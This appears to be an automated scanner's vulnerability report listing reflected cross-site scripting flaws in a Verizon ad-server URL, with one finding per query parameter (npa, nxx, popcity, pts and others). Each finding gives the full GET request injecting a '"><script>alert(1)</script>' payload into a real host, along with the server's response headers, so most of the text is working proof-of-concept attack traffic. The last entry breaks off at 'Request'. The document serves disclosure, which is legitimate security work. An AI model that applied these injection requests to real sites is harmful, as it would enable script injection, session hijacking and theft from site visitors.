GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
1.49. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecc"><script>alert(1)</script>f8e5a220c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:59:06 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1366 Content-Type: text/html Cache-Control: private Content-Length: 1366
The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcf3"><script>alert(1)</script>2819918f614 was submitted in the npa parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:53:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa3fa"><script>alert(1)</script>c8d299f1c04 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:54:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dcdc"><script>alert(1)</script>690eb2ffc82 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 476c8"><script>alert(1)</script>1cd684a7591 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=476c8"><script>alert(1)</script>1cd684a7591&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:42 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae33"><script>alert(1)</script>082704e552e was submitted in the popcity parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=3ae33"><script>alert(1)</script>082704e552e&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db20a"><script>alert(1)</script>ad98c8a48bd was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=db20a"><script>alert(1)</script>ad98c8a48bd&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:04 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671eb"><script>alert(1)</script>2aafe3d0cfd was submitted in the popdma parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=671eb"><script>alert(1)</script>2aafe3d0cfd&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21fa6"><script>alert(1)</script>3ed604c7372 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=21fa6"><script>alert(1)</script>3ed604c7372&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:49:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33f3"><script>alert(1)</script>46c97c97412 was submitted in the popip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=e33f3"><script>alert(1)</script>46c97c97412&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:49:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 289de"><script>alert(1)</script>a27e6e3596 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=289de"><script>alert(1)</script>a27e6e3596&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:51:36 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1358 Content-Type: text/html Cache-Control: private Content-Length: 1358
The value of the popstate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1949"><script>alert(1)</script>a3917a638a8 was submitted in the popstate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=d1949"><script>alert(1)</script>a3917a638a8&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the popzipcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94696"><script>alert(1)</script>f2fcdc1fb36 was submitted in the popzipcode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=94696"><script>alert(1)</script>f2fcdc1fb36&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:50:47 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the prizm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d47"><script>alert(1)</script>810ed66b159 was submitted in the prizm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=56d47"><script>alert(1)</script>810ed66b159&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:52:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1362 Content-Type: text/html Cache-Control: private Content-Length: 1362
The value of the pts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862d1"><script>alert(1)</script>ce12940af71 was submitted in the pts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 01:56:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1360 Content-Type: text/html Cache-Control: private Content-Length: 1360
The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a25"><script>alert(1)</script>030f87d661d was submitted in the pws parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
